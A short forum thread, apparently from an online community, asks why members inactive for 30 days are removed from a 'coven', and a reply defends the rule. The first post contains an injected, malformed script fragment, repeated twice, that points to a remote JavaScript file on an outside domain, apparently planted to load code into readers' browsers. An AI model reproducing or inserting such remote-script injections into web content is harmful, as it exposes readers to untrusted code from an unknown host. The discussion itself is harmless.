Coven inactivity 30 days

I have never fully understood the feature for if a member is inactive for 30 days they automatically get removed from a coven, what is this feature for. can anyone shed some information on this, perhaps one of the sites moderation, or even petrarca sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

I'm assuming Petrarca made the feature, so he's the only one who would know for sure. In my opinion: If someone isn't active for 30 days, obviously they are not contributing to the coven. Why should their account sit idle in the coven when they're not actively using it?
